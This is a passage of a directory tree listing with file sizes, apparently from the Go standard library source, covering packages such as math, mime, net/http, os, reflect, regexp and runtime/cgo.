│ │ │ │ ├── [2.0K] log.go
│ │ │ │ ├── [ 372] phase.go
│ │ │ │ ├── [ 371] polar.go
│ │ │ │ ├── [2.3K] pow.go
│ │ │ │ ├── [ 348] rect.go
│ │ │ │ ├── [4.8K] sin.go
│ │ │ │ ├── [3.0K] sqrt.go
│ │ │ │ └── [8.5K] tan.go
│ │ │ ├── [2.3K] const.go
│ │ │ ├── [ 396] copysign.go
│ │ │ ├── [5.6K] cosh_s390x.s
│ │ │ ├── [1.9K] dim_amd64.s
│ │ │ ├── [ 963] dim_arm64.s
│ │ │ ├── [ 344] dim_asm.go
│ │ │ ├── [1.7K] dim.go
│ │ │ ├── [ 410] dim_noasm.go
│ │ │ ├── [1.2K] dim_riscv64.s
│ │ │ ├── [2.0K] dim_s390x.s
│ │ │ ├── [ 14K] erfc_s390x.s
│ │ │ ├── [ 12K] erf.go
│ │ │ ├── [3.4K] erfinv.go
│ │ │ ├── [8.5K] erf_s390x.s
│ │ │ ├── [ 252] exp2_asm.go
│ │ │ ├── [ 284] exp2_noasm.go
│ │ │ ├── [ 261] exp_amd64.go
│ │ │ ├── [4.2K] exp_amd64.s
│ │ │ ├── [5.4K] exp_arm64.s
│ │ │ ├── [ 268] exp_asm.go
│ │ │ ├── [5.4K] exp.go
│ │ │ ├── [7.9K] expm1.go
│ │ │ ├── [5.3K] expm1_s390x.s
│ │ │ ├── [ 302] exp_noasm.go
│ │ │ ├── [4.6K] exp_s390x.s
│ │ │ ├── [1.5K] floor_386.s
│ │ │ ├── [2.0K] floor_amd64.s
│ │ │ ├── [ 573] floor_arm64.s
│ │ │ ├── [ 431] floor_asm.go
│ │ │ ├── [3.3K] floor.go
│ │ │ ├── [ 531] floor_noasm.go
│ │ │ ├── [ 523] floor_ppc64x.s
│ │ │ ├── [ 579] floor_s390x.s
│ │ │ ├── [ 459] floor_wasm.s
│ │ │ ├── [4.5K] fma.go
│ │ │ ├── [ 929] frexp.go
│ │ │ ├── [5.5K] gamma.go
│ │ │ ├── [1.8K] hypot_386.s
│ │ │ ├── [1.1K] hypot_amd64.s
│ │ │ ├── [ 264] hypot_asm.go
│ │ │ ├── [ 848] hypot.go
│ │ │ ├── [ 297] hypot_noasm.go
│ │ │ ├── [ 14K] j0.go
│ │ │ ├── [ 13K] j1.go
│ │ │ ├── [7.2K] jn.go
│ │ │ ├── [1.0K] ldexp.go
│ │ │ ├── [ 11K] lgamma.go
│ │ │ ├── [ 869] log10.go
│ │ │ ├── [4.7K] log10_s390x.s
│ │ │ ├── [6.3K] log1p.go
│ │ │ ├── [5.1K] log1p_s390x.s
│ │ │ ├── [3.7K] log_amd64.s
│ │ │ ├── [ 259] log_asm.go
│ │ │ ├── [1020] logb.go
│ │ │ ├── [3.9K] log.go
│ │ │ ├── [4.3K] log_s390x.s
│ │ │ ├── [ 292] log_stub.go
│ │ │ ├── [ 447] modf_arm64.s
│ │ │ ├── [ 292] modf_asm.go
│ │ │ ├── [ 913] modf.go
│ │ │ ├── [ 326] modf_noasm.go
│ │ │ ├── [ 440] modf_ppc64x.s
│ │ │ ├── [ 903] mod.go
│ │ │ ├── [1.2K] nextafter.go
│ │ │ ├── [1.2K] pow10.go
│ │ │ ├── [3.2K] pow.go
│ │ │ ├── [ 16K] pow_s390x.s
│ │ │ ├── [4.0K] rand
│ │ │ │ ├── [ 11K] exp.go
│ │ │ │ ├── [1.5K] gen_cooked.go
│ │ │ │ ├── [6.3K] normal.go
│ │ │ │ ├── [ 13K] rand.go
│ │ │ │ ├── [ 15K] rng.go
│ │ │ │ └── [1.8K] zipf.go
│ │ │ ├── [2.0K] remainder.go
│ │ │ ├── [ 302] signbit.go
│ │ │ ├── [1.8K] sincos.go
│ │ │ ├── [6.4K] sin.go
│ │ │ ├── [1.7K] sinh.go
│ │ │ ├── [6.0K] sinh_s390x.s
│ │ │ ├── [8.3K] sin_s390x.s
│ │ │ ├── [ 304] sqrt_386.s
│ │ │ ├── [ 334] sqrt_amd64.s
│ │ │ ├── [ 310] sqrt_arm64.s
│ │ │ ├── [ 529] sqrt_arm.s
│ │ │ ├── [ 341] sqrt_asm.go
│ │ │ ├── [4.9K] sqrt.go
│ │ │ ├── [ 409] sqrt_mipsx.s
│ │ │ ├── [ 383] sqrt_noasm.go
│ │ │ ├── [ 362] sqrt_ppc64x.s
│ │ │ ├── [ 308] sqrt_riscv64.s
│ │ │ ├── [ 309] sqrt_s390x.s
│ │ │ ├── [ 273] sqrt_wasm.s
│ │ │ ├── [2.6K] stubs.go
│ │ │ ├── [ 12K] stubs_s390x.s
│ │ │ ├── [3.7K] tan.go
│ │ │ ├── [2.7K] tanh.go
│ │ │ ├── [4.6K] tanh_s390x.s
│ │ │ ├── [2.7K] tan_s390x.s
│ │ │ ├── [3.3K] trig_reduce.go
│ │ │ └── [1.3K] unsafe.go
│ │ ├── [4.0K] mime
│ │ │ ├── [10.0K] encodedword.go
│ │ │ ├── [ 828] grammar.go
│ │ │ ├── [9.7K] mediatype.go
│ │ │ ├── [4.0K] multipart
│ │ │ │ ├── [4.2K] formdata.go
│ │ │ │ ├── [ 12K] multipart.go
│ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ └── [1.1K] nested-mime
│ │ │ │ └── [4.8K] writer.go
│ │ │ ├── [4.0K] quotedprintable
│ │ │ │ ├── [3.6K] reader.go
│ │ │ │ └── [3.2K] writer.go
│ │ │ ├── [4.0K] testdata
│ │ │ │ ├── [ 239] test.types
│ │ │ │ ├── [ 303] test.types.globs2
│ │ │ │ └── [ 257] test.types.plan9
│ │ │ ├── [ 250] type_dragonfly.go
│ │ │ ├── [ 250] type_freebsd.go
│ │ │ ├── [5.2K] type.go
│ │ │ ├── [ 251] type_openbsd.go
│ │ │ ├── [1.0K] type_plan9.go
│ │ │ ├── [2.5K] type_unix.go
│ │ │ └── [ 829] type_windows.go
│ │ ├── [4.0K] net
│ │ │ ├── [9.5K] addrselect.go
│ │ │ ├── [ 582] cgo_aix.go
│ │ │ ├── [ 272] cgo_android.go
│ │ │ ├── [ 353] cgo_bsd.go
│ │ │ ├── [ 642] cgo_linux.go
│ │ │ ├── [ 276] cgo_netbsd.go
│ │ │ ├── [ 276] cgo_openbsd.go
│ │ │ ├── [ 590] cgo_resnew.go
│ │ │ ├── [ 579] cgo_resold.go
│ │ │ ├── [ 753] cgo_socknew.go
│ │ │ ├── [ 852] cgo_sockold.go
│ │ │ ├── [ 343] cgo_solaris.go
│ │ │ ├── [1.1K] cgo_stub.go
│ │ │ ├── [9.5K] cgo_unix.go
│ │ │ ├── [ 402] cgo_windows.go
│ │ │ ├── [8.6K] conf.go
│ │ │ ├── [ 370] conf_netcgo.go
│ │ │ ├── [ 23K] dial.go
│ │ │ ├── [5.8K] dnsclient.go
│ │ │ ├── [ 22K] dnsclient_unix.go
│ │ │ ├── [5.4K] dnsconfig_unix.go
│ │ │ ├── [ 224] error_plan9.go
│ │ │ ├── [ 542] error_posix.go
│ │ │ ├── [ 372] error_unix.go
│ │ │ ├── [ 355] error_windows.go
│ │ │ ├── [3.6K] fd_plan9.go
│ │ │ ├── [4.3K] fd_posix.go
│ │ │ ├── [5.4K] fd_unix.go
│ │ │ ├── [4.6K] fd_windows.go
│ │ │ ├── [1.7K] file.go
│ │ │ ├── [2.7K] file_plan9.go
│ │ │ ├── [ 489] file_stub.go
│ │ │ ├── [2.5K] file_unix.go
│ │ │ ├── [ 521] file_windows.go
│ │ │ ├── [ 628] hook.go
│ │ │ ├── [ 283] hook_plan9.go
│ │ │ ├── [ 690] hook_unix.go
│ │ │ ├── [ 875] hook_windows.go
│ │ │ ├── [3.0K] hosts.go
│ │ │ ├── [4.0K] http
│ │ │ │ ├── [4.0K] cgi
│ │ │ │ │ ├── [5.5K] child.go
│ │ │ │ │ ├── [ 10K] host.go
│ │ │ │ │ └── [4.0K] testdata
│ │ │ │ │ └── [2.1K] test.cgi
│ │ │ │ ├── [ 33K] client.go
│ │ │ │ ├── [1.6K] clone.go
│ │ │ │ ├── [ 11K] cookie.go
│ │ │ │ ├── [4.0K] cookiejar
│ │ │ │ │ ├── [ 13K] jar.go
│ │ │ │ │ └── [3.4K] punycode.go
│ │ │ │ ├── [3.4K] doc.go
│ │ │ │ ├── [4.0K] fcgi
│ │ │ │ │ ├── [ 10K] child.go
│ │ │ │ │ └── [5.7K] fcgi.go
│ │ │ │ ├── [2.9K] filetransport.go
│ │ │ │ ├── [ 27K] fs.go
│ │ │ │ ├── [339K] h2_bundle.go
│ │ │ │ ├── [7.7K] header.go
│ │ │ │ ├── [5.0K] http.go
│ │ │ │ ├── [4.0K] httptest
│ │ │ │ │ ├── [2.3K] httptest.go
│ │ │ │ │ ├── [7.0K] recorder.go
│ │ │ │ │ └── [ 11K] server.go
│ │ │ │ ├── [4.0K] httptrace
│ │ │ │ │ └── [8.1K] trace.go
│ │ │ │ ├── [4.0K] httputil
│ │ │ │ │ ├── [9.4K] dump.go
│ │ │ │ │ ├── [1.6K] httputil.go
│ │ │ │ │ ├── [ 11K] persist.go
│ │ │ │ │ └── [ 18K] reverseproxy.go
│ │ │ │ ├── [4.0K] internal
│ │ │ │ │ ├── [4.0K] ascii
│ │ │ │ │ │ └── [1.2K] print.go
│ │ │ │ │ ├── [6.6K] chunked.go
│ │ │ │ │ └── [4.0K] testcert
│ │ │ │ │ └── [3.6K] testcert.go
│ │ │ │ ├── [ 900] jar.go
│ │ │ │ ├── [ 517] method.go
│ │ │ │ ├── [1.7K] omithttp2.go
│ │ │ │ ├── [4.0K] pprof
│ │ │ │ │ └── [ 13K] pprof.go
│ │ │ │ ├── [ 46K] request.go
│ │ │ │ ├── [ 11K] response.go
│ │ │ │ ├── [ 567] roundtrip.go
│ │ │ │ ├── [ 10K] roundtrip_js.go
│ │ │ │ ├── [110K] server.go
│ │ │ │ ├── [8.0K] sniff.go
│ │ │ │ ├── [ 13K] socks_bundle.go
│ │ │ │ ├── [7.4K] status.go
│ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ ├── [ 11] file
│ │ │ │ │ ├── [ 22] index.html
│ │ │ │ │ └── [ 8] style.css
│ │ │ │ ├── [ 30K] transfer.go
│ │ │ │ ├── [ 370] transport_default_js.go
│ │ │ │ ├── [ 390] transport_default_other.go
│ │ │ │ ├── [ 86K] transport.go
│ │ │ │ └── [3.2K] triv.go
│ │ │ ├── [4.4K] interface_aix.go
│ │ │ ├── [2.8K] interface_bsd.go
│ │ │ ├── [ 718] interface_bsdvar.go
│ │ │ ├── [1.3K] interface_darwin.go
│ │ │ ├── [1.3K] interface_freebsd.go
│ │ │ ├── [7.2K] interface.go
│ │ │ ├── [6.9K] interface_linux.go
│ │ │ ├── [4.7K] interface_plan9.go
│ │ │ ├── [2.1K] interface_solaris.go
│ │ │ ├── [ 812] interface_stub.go
│ │ │ ├── [5.4K] interface_windows.go
│ │ │ ├── [4.0K] internal
│ │ │ │ └── [4.0K] socktest
│ │ │ │ ├── [4.8K] switch.go
│ │ │ │ ├── [1.0K] switch_posix.go
│ │ │ │ ├── [ 455] switch_stub.go
│ │ │ │ ├── [ 708] switch_unix.go
│ │ │ │ ├── [ 730] switch_windows.go
│ │ │ │ ├── [1.0K] sys_cloexec.go
│ │ │ │ ├── [4.0K] sys_unix.go
│ │ │ │ └── [5.1K] sys_windows.go
│ │ │ ├── [ 18K] ip.go
│ │ │ ├── [7.1K] iprawsock.go
│ │ │ ├── [ 874] iprawsock_plan9.go
│ │ │ ├── [3.4K] iprawsock_posix.go
│ │ │ ├── [9.0K] ipsock.go
│ │ │ ├── [7.5K] ipsock_plan9.go
│ │ │ ├── [7.5K] ipsock_posix.go
│ │ │ ├── [1.6K] lookup_fake.go
│ │ │ ├── [ 22K] lookup.go
│ │ │ ├── [7.6K] lookup_plan9.go
│ │ │ ├── [8.7K] lookup_unix.go
│ │ │ ├── [ 12K] lookup_windows.go
│ │ │ ├── [1.9K] mac.go
│ │ │ ├── [4.0K] mail
│ │ │ │ └── [ 21K] message.go
│ │ │ ├── [6.4K] net_fake.go
│ │ │ ├── [ 23K] net.go
│ │ │ ├── [4.0K] netip
│ │ │ │ ├── [1.4K] leaf_alts.go
│ │ │ │ ├── [ 42K] netip.go
│ │ │ │ └── [2.4K] uint128.go
│ │ │ ├── [3.7K] nss.go
│ │ │ ├── [7.1K] parse.go
│ │ │ ├── [5.4K] pipe.go
│ │ │ ├── [1.5K] port.go
│ │ │ ├── [1.2K] port_unix.go
│ │ │ ├── [1.9K] rawconn.go
│ │ │ ├── [4.0K] rpc
│ │ │ │ ├── [8.9K] client.go
│ │ │ │ ├── [2.2K] debug.go
│ │ │ │ ├── [4.0K] jsonrpc
│ │ │ │ │ ├── [2.9K] client.go
│ │ │ │ │ └── [3.2K] server.go
│ │ │ │ └── [ 22K] server.go
│ │ │ ├── [1.1K] sendfile_linux.go
│ │ │ ├── [ 344] sendfile_stub.go
│ │ │ ├── [2.0K] sendfile_unix_alt.go
│ │ │ ├── [1.0K] sendfile_windows.go
│ │ │ ├── [4.0K] smtp
│ │ │ │ ├── [3.7K] auth.go
│ │ │ │ └── [ 12K] smtp.go
│ │ │ ├── [ 914] sockaddr_posix.go
│ │ │ ├── [ 918] sock_bsd.go
│ │ │ ├── [1.5K] sock_cloexec.go
│ │ │ ├── [1.5K] sock_linux.go
│ │ │ ├── [1.4K] sockopt_aix.go
│ │ │ ├── [2.2K] sockopt_bsd.go
│ │ │ ├── [ 867] sockoptip_bsdvar.go
│ │ │ ├── [ 735] sockoptip_linux.go
│ │ │ ├── [1.4K] sockoptip_posix.go
│ │ │ ├── [ 767] sockoptip_stub.go
│ │ │ ├── [ 819] sockoptip_windows.go
│ │ │ ├── [1.3K] sockopt_linux.go
│ │ │ ├── [ 406] sockopt_plan9.go
│ │ │ ├── [2.6K] sockopt_posix.go
│ │ │ ├── [1.3K] sockopt_solaris.go
│ │ │ ├── [ 742] sockopt_stub.go
│ │ │ ├── [1.5K] sockopt_windows.go
│ │ │ ├── [ 262] sock_plan9.go
│ │ │ ├── [6.8K] sock_posix.go
│ │ │ ├── [ 390] sock_stub.go
│ │ │ ├── [1.2K] sock_windows.go
│ │ │ ├── [1.1K] splice_linux.go
│ │ │ ├── [ 287] splice_stub.go
│ │ │ ├── [ 987] sys_cloexec.go
│ │ │ ├── [ 11K] tcpsock.go
│ │ │ ├── [ 770] tcpsockopt_darwin.go
│ │ │ ├── [ 698] tcpsockopt_dragonfly.go
│ │ │ ├── [ 365] tcpsockopt_openbsd.go
│ │ │ ├── [ 525] tcpsockopt_plan9.go
│ │ │ ├── [ 442] tcpsockopt_posix.go
│ │ │ ├── [1.2K] tcpsockopt_solaris.go
│ │ │ ├── [ 397] tcpsockopt_stub.go
│ │ │ ├── [ 722] tcpsockopt_unix.go
│ │ │ ├── [ 741] tcpsockopt_windows.go
│ │ │ ├── [2.1K] tcpsock_plan9.go
│ │ │ ├── [5.2K] tcpsock_posix.go
│ │ │ ├── [4.0K] testdata
│ │ │ │ ├── [ 71] case-hosts
│ │ │ │ ├── [ 78] domain-resolv.conf
│ │ │ │ ├── [ 19] empty-resolv.conf
│ │ │ │ ├── [ 13] freebsd-usevc-resolv.conf
│ │ │ │ ├── [ 242] hosts
│ │ │ │ ├── [ 775] igmp
│ │ │ │ ├── [1.2K] igmp6
│ │ │ │ ├── [ 21] invalid-ndots-resolv.conf
│ │ │ │ ├── [ 274] ipv4-hosts
│ │ │ │ ├── [ 460] ipv6-hosts
│ │ │ │ ├── [ 16] large-ndots-resolv.conf
│ │ │ │ ├── [ 14] linux-use-vc-resolv.conf
│ │ │ │ ├── [ 16] negative-ndots-resolv.conf
│ │ │ │ ├── [ 133] openbsd-resolv.conf
│ │ │ │ ├── [ 11] openbsd-tcp-resolv.conf
│ │ │ │ ├── [ 177] resolv.conf
│ │ │ │ ├── [ 78] search-resolv.conf
│ │ │ │ ├── [ 14] singleline-hosts
│ │ │ │ ├── [ 29] single-request-reopen-resolv.conf
│ │ │ │ └── [ 22] single-request-resolv.conf
│ │ │ ├── [4.0K] textproto
│ │ │ │ ├── [1.6K] header.go
│ │ │ │ ├── [3.0K] pipeline.go
│ │ │ │ ├── [ 19K] reader.go
│ │ │ │ ├── [3.7K] textproto.go
│ │ │ │ └── [2.5K] writer.go
│ │ │ ├── [ 12K] udpsock.go
│ │ │ ├── [4.6K] udpsock_plan9.go
│ │ │ ├── [6.8K] udpsock_posix.go
│ │ │ ├── [ 10K] unixsock.go
│ │ │ ├── [1.2K] unixsock_plan9.go
│ │ │ ├── [5.9K] unixsock_posix.go
│ │ │ ├── [ 654] unixsock_readmsg_cloexec.go
│ │ │ ├── [ 332] unixsock_readmsg_cmsg_cloexec.go
│ │ │ ├── [ 275] unixsock_readmsg_other.go
│ │ │ ├── [4.0K] url
│ │ │ │ └── [ 34K] url.go
│ │ │ └── [ 733] writev_unix.go
│ │ ├── [4.0K] os
│ │ │ ├── [2.9K] dir_darwin.go
│ │ │ ├── [ 759] dirent_aix.go
│ │ │ ├── [1.3K] dirent_dragonfly.go
│ │ │ ├── [1.2K] dirent_freebsd.go
│ │ │ ├── [ 678] dirent_js.go
│ │ │ ├── [1.2K] dirent_linux.go
│ │ │ ├── [1.2K] dirent_netbsd.go
│ │ │ ├── [1.2K] dirent_openbsd.go
│ │ │ ├── [ 759] dirent_solaris.go
│ │ │ ├── [4.4K] dir.go
│ │ │ ├── [2.0K] dir_plan9.go
│ │ │ ├── [4.9K] dir_unix.go
│ │ │ ├── [1.7K] dir_windows.go
│ │ │ ├── [ 244] endian_big.go
│ │ │ ├── [ 293] endian_little.go
│ │ │ ├── [3.8K] env.go
│ │ │ ├── [ 247] error_errno.go
│ │ │ ├── [4.8K] error.go
│ │ │ ├── [ 234] error_plan9.go
│ │ │ ├── [ 527] error_posix.go
│ │ │ ├── [4.0K] exec
│ │ │ │ ├── [ 22K] exec.go
│ │ │ │ ├── [ 507] exec_plan9.go
│ │ │ │ ├── [ 534] exec_unix.go
│ │ │ │ ├── [ 621] exec_windows.go
│ │ │ │ ├── [4.0K] internal
│ │ │ │ │ └── [4.0K] fdtest
│ │ │ │ │ ├── [ 390] exists_js.go
│ │ │ │ │ ├── [ 459] exists_plan9.go
│ │ │ │ │ ├── [ 479] exists_unix.go
│ │ │ │ │ └── [ 305] exists_windows.go
│ │ │ │ ├── [ 820] lp_js.go
│ │ │ │ ├── [1.4K] lp_plan9.go
│ │ │ │ ├── [1.5K] lp_unix.go
│ │ │ │ ├── [2.1K] lp_windows.go
│ │ │ │ └── [2.2K] read3.go
│ │ │ ├── [5.9K] exec.go
│ │ │ ├── [3.3K] exec_plan9.go
│ │ │ ├── [3.4K] exec_posix.go
│ │ │ ├── [2.1K] exec_unix.go
│ │ │ ├── [ 613] executable_darwin.go
│ │ │ ├── [ 293] executable_dragonfly.go
│ │ │ ├── [ 292] executable_freebsd.go
│ │ │ ├── [ 774] executable.go
│ │ │ ├── [2.3K] executable_path.go
│ │ │ ├── [ 427] executable_plan9.go
│ │ │ ├── [ 920] executable_procfs.go
│ │ │ ├── [ 695] executable_solaris.go
│ │ │ ├── [ 891] executable_sysctl.go
│ │ │ ├── [ 641] executable_windows.go
│ │ │ ├── [4.9K] exec_windows.go
│ │ │ ├── [ 22K] file.go
│ │ │ ├── [ 15K] file_plan9.go
│ │ │ ├── [7.0K] file_posix.go
│ │ │ ├── [ 12K] file_unix.go
│ │ │ ├── [ 14K] file_windows.go
│ │ │ ├── [2.5K] getwd.go
│ │ │ ├── [2.0K] path.go
│ │ │ ├── [ 497] path_plan9.go
│ │ │ ├── [1.6K] path_unix.go
│ │ │ ├── [6.0K] path_windows.go
│ │ │ ├── [ 658] pipe2_unix.go
│ │ │ ├── [ 794] pipe_unix.go
│ │ │ ├── [2.1K] proc.go
│ │ │ ├── [ 993] rawconn.go
│ │ │ ├── [1.0K] readfrom_linux.go
│ │ │ ├── [ 302] readfrom_stub.go
│ │ │ ├── [4.7K] removeall_at.go
│ │ │ ├── [3.1K] removeall_noat.go
│ │ │ ├── [ 622] rlimit_darwin.go
│ │ │ ├── [1.2K] rlimit.go
│ │ │ ├── [ 412] rlimit_stub.go
│ │ │ ├── [4.0K] signal
│ │ │ │ ├── [ 11K] doc.go
│ │ │ │ ├── [4.0K] internal
│ │ │ │ │ └── [4.0K] pty
│ │ │ │ │ └── [1.4K] pty.go
│ │ │ │ ├── [8.3K] signal.go
│ │ │ │ ├── [1.0K] signal_plan9.go
│ │ │ │ ├── [1023] signal_unix.go
│ │ │ │ └── [ 410] sig.s
│ │ │ ├── [1.2K] stat_aix.go
│ │ │ ├── [1.1K] stat_darwin.go
│ │ │ ├── [1.1K] stat_dragonfly.go
│ │ │ ├── [1.1K] stat_freebsd.go
│ │ │ ├── [ 733] stat.go
│ │ │ ├── [1.1K] stat_js.go
│ │ │ ├── [1.1K] stat_linux.go
│ │ │ ├── [1.1K] stat_netbsd.go
│ │ │ ├── [1.1K] stat_openbsd.go
│ │ │ ├── [2.3K] stat_plan9.go
│ │ │ ├── [1.3K] stat_solaris.go
│ │ │ ├── [1.2K] stat_unix.go
│ │ │ ├── [3.6K] stat_windows.go
│ │ │ ├── [ 415] sticky_bsd.go
│ │ │ ├── [ 320] sticky_notbsd.go
│ │ │ ├── [ 817] str.go
│ │ │ ├── [ 682] sys_aix.go
│ │ │ ├── [ 456] sys_bsd.go
│ │ │ ├── [ 294] sys.go
│ │ │ ├── [ 313] sys_js.go
│ │ │ ├── [1.0K] sys_linux.go
│ │ │ ├── [ 453] sys_plan9.go
│ │ │ ├── [ 265] sys_solaris.go
│ │ │ ├── [ 493] sys_unix.go
│ │ │ ├── [ 874] sys_windows.go
│ │ │ ├── [3.8K] tempfile.go
│ │ │ ├── [4.0K] testdata
│ │ │ │ ├── [4.0K] dirfs
│ │ │ │ │ ├── [ 0] a
│ │ │ │ │ ├── [ 0] b
│ │ │ │ │ └── [4.0K] dir
│ │ │ │ │ └── [ 0] x
│ │ │ │ ├── [ 16] hello
│ │ │ │ └── [4.0K] issue37161
│ │ │ │ ├── [ 2] a
│ │ │ │ ├── [ 2] b
│ │ │ │ └── [ 2] c
│ │ │ ├── [2.8K] types.go
│ │ │ ├── [ 815] types_plan9.go
│ │ │ ├── [ 776] types_unix.go
│ │ │ ├── [6.3K] types_windows.go
│ │ │ ├── [4.0K] user
│ │ │ │ ├── [1.2K] cgo_listgroups_unix.go
│ │ │ │ ├── [6.4K] cgo_lookup_unix.go
│ │ │ │ ├── [1.3K] getgrouplist_darwin.go
│ │ │ │ ├── [1.2K] getgrouplist_unix.go
│ │ │ │ ├── [ 386] listgroups_stub.go
│ │ │ │ ├── [2.9K] listgroups_unix.go
│ │ │ │ ├── [ 676] lookup_android.go
│ │ │ │ ├── [1.7K] lookup.go
│ │ │ │ ├── [1.2K] lookup_plan9.go
│ │ │ │ ├── [1.6K] lookup_stubs.go
│ │ │ │ ├── [6.0K] lookup_unix.go
│ │ │ │ ├── [ 12K] lookup_windows.go
│ │ │ │ └── [2.9K] user.go
│ │ │ ├── [ 899] wait_unimp.go
│ │ │ ├── [1.5K] wait_wait6.go
│ │ │ └── [1.3K] wait_waitid.go
│ │ ├── [4.0K] path
│ │ │ ├── [4.0K] filepath
│ │ │ │ ├── [8.3K] match.go
│ │ │ │ ├── [ 17K] path.go
│ │ │ │ ├── [1.2K] path_plan9.go
│ │ │ │ ├── [1.2K] path_unix.go
│ │ │ │ ├── [5.0K] path_windows.go
│ │ │ │ ├── [3.2K] symlink.go
│ │ │ │ ├── [ 117] symlink_unix.go
│ │ │ │ └── [2.9K] symlink_windows.go
│ │ │ ├── [5.3K] match.go
│ │ │ └── [6.0K] path.go
│ │ ├── [4.0K] plugin
│ │ │ ├── [4.0K] plugin_dlopen.go
│ │ │ ├── [2.0K] plugin.go
│ │ │ └── [ 451] plugin_stubs.go
│ │ ├── [ 884] race.bash
│ │ ├── [1.1K] race.bat
│ │ ├── [2.2K] README.vendor
│ │ ├── [4.0K] reflect
│ │ │ ├── [ 15K] abi.go
│ │ │ ├── [1.1K] asm_386.s
│ │ │ ├── [2.8K] asm_amd64.s
│ │ │ ├── [2.8K] asm_arm64.s
│ │ │ ├── [1.1K] asm_arm.s
│ │ │ ├── [1.2K] asm_mips64x.s
│ │ │ ├── [1.2K] asm_mipsx.s
│ │ │ ├── [3.3K] asm_ppc64x.s
│ │ │ ├── [2.6K] asm_riscv64.s
│ │ │ ├── [1.1K] asm_s390x.s
│ │ │ ├── [1.1K] asm_wasm.s
│ │ │ ├── [7.4K] deepequal.go
│ │ │ ├── [ 669] float32reg_generic.go
│ │ │ ├── [ 838] float32reg_ppc64x.s
│ │ │ ├── [4.0K] internal
│ │ │ │ ├── [4.0K] example1
│ │ │ │ │ └── [ 86] example.go
│ │ │ │ └── [4.0K] example2
│ │ │ │ └── [ 86] example.go
│ │ │ ├── [5.9K] makefunc.go
│ │ │ ├── [ 292] stubs_ppc64x.go
│ │ │ ├── [2.0K] swapper.go
│ │ │ ├── [ 87K] type.go
│ │ │ ├── [106K] value.go
│ │ │ └── [3.0K] visiblefields.go
│ │ ├── [4.0K] regexp
│ │ │ ├── [8.8K] backtrack.go
│ │ │ ├── [ 12K] exec.go
│ │ │ ├── [ 14K] onepass.go
│ │ │ ├── [ 38K] regexp.go
│ │ │ ├── [4.0K] syntax
│ │ │ │ ├── [6.8K] compile.go
│ │ │ │ ├── [5.3K] doc.go
│ │ │ │ ├── [2.4K] make_perl_groups.pl
│ │ │ │ ├── [ 663] op_string.go
│ │ │ │ ├── [ 48K] parse.go
│ │ │ │ ├── [2.3K] perl_groups.go
│ │ │ │ ├── [7.5K] prog.go
│ │ │ │ ├── [7.7K] regexp.go
│ │ │ │ └── [4.2K] simplify.go
│ │ │ └── [4.0K] testdata
│ │ │ ├── [8.4K] basic.dat
│ │ │ ├── [1.8K] nullsubexpr.dat
│ │ │ ├── [418K] re2-exhaustive.txt.bz2
│ │ │ ├── [ 42K] re2-search.txt
│ │ │ ├── [ 957] README
│ │ │ ├── [6.6K] repetition.dat
│ │ │ └── [ 51K] testregex.c
│ │ ├── [1.7K] run.bash
│ │ ├── [ 842] run.bat
│ │ ├── [ 396] run.rc
│ │ ├── [ 20K] runtime
│ │ │ ├── [9.5K] alg.go
│ │ │ ├── [4.0K] asan
│ │ │ │ └── [ 911] asan.go
│ │ │ ├── [ 657] asan0.go
│ │ │ ├── [2.2K] asan_amd64.s
│ │ │ ├── [1.9K] asan_arm64.s
│ │ │ ├── [1.4K] asan.go
│ │ │ ├── [ 40K] asm_386.s
│ │ │ ├── [ 411] asm_amd64.h
│ │ │ ├── [ 57K] asm_amd64.s
│ │ │ ├── [ 34K] asm_arm64.s
│ │ │ ├── [ 30K] asm_arm.s
│ │ │ ├── [ 22K] asm_mips64x.s
│ │ │ ├── [ 24K] asm_mipsx.s
│ │ │ ├── [1023] asm_ppc64x.h
│ │ │ ├── [ 30K] asm_ppc64x.s
│ │ │ ├── [ 26K] asm_riscv64.s
│ │ │ ├── [ 278] asm.s
│ │ │ ├── [ 26K] asm_s390x.s
│ │ │ ├── [9.4K] asm_wasm.s
│ │ │ ├── [ 259] atomic_arm64.s
│ │ │ ├── [ 300] atomic_mips64x.s
│ │ │ ├── [ 262] atomic_mipsx.s
│ │ │ ├── [2.6K] atomic_pointer.go
│ │ │ ├── [ 437] atomic_ppc64x.s
│ │ │ ├── [ 275] atomic_riscv64.s
│ │ │ ├── [ 298] auxv_none.go
│ │ │ ├── [4.0K] cgo
│ │ │ │ ├── [2.7K] abi_amd64.h
│ │ │ │ ├── [1.5K] abi_arm64.h
│ │ │ │ ├── [ 737] asm_386.s
│ │ │ │ ├── [ 937] asm_amd64.s
│ │ │ │ ├── [1.0K] asm_arm64.s
│ │ │ │ ├── [1.8K] asm_arm.s
│ │ │ │ ├── [2.1K] asm_mips64x.s
│ │ │ │ ├── [2.0K] asm_mipsx.s
│ │ │ │ ├── [3.3K] asm_ppc64x.s
│ │ │ │ ├── [1.9K] asm_riscv64.s
│ │ │ │ ├── [1.3K] asm_s390x.s
│ │ │ │ ├── [ 223] asm_wasm.s
│ │ │ │ ├── [ 402] callbacks_aix.go
│ │ │ │ ├── [3.9K] callbacks.go
│ │ │ │ ├── [ 475] callbacks_traceback.go
│ │ │ │ ├── [ 862] cgo.go
│ │ │ │ ├── [ 485] dragonfly.go
│ │ │ │ ├── [ 549] freebsd.go
│ │ │ │ ├── [ 834] gcc_386.S
│ │ │ │ ├── [1.3K] gcc_aix_ppc64.c
│ │ │ │ ├── [2.7K] gcc_aix_ppc64.S
│ │ │ │ ├── [1.1K] gcc_amd64.S
│ │ │ │ ├── [2.6K] gcc_android.c
│ │ │ │ ├── [1.7K] gcc_arm64.S
│ │ │ │ ├── [1.1K] gcc_arm.S
│ │ │ │ ├── [ 529] gcc_context.c
│ │ │ │ ├── [1.3K] gcc_darwin_amd64.c
│ │ │ │ ├── [3.7K] gcc_darwin_arm64.c
│ │ │ │ ├── [1.3K] gcc_dragonfly_amd64.c
│ │ │ │ ├── [ 469] gcc_fatalf.c
│ │ │ │ ├── [1.3K] gcc_freebsd_386.c
│ │ │ │ ├── [1.6K] gcc_freebsd_amd64.c
│ │ │ │ ├── [1.4K] gcc_freebsd_arm64.c
│ │ │ │ ├── [1.6K] gcc_freebsd_arm.c
│ │ │ │ ├── [2.0K] gcc_freebsd_sigaction.c
│ │ │ │ ├── [3.2K] gcc_libinit.c
│ │ │ │ ├── [3.1K] gcc_libinit_windows.c
│ │ │ │ ├── [1.7K] gcc_linux_386.c
│ │ │ │ ├── [2.3K] gcc_linux_amd64.c
│ │ │ │ ├── [2.5K] gcc_linux_arm64.c
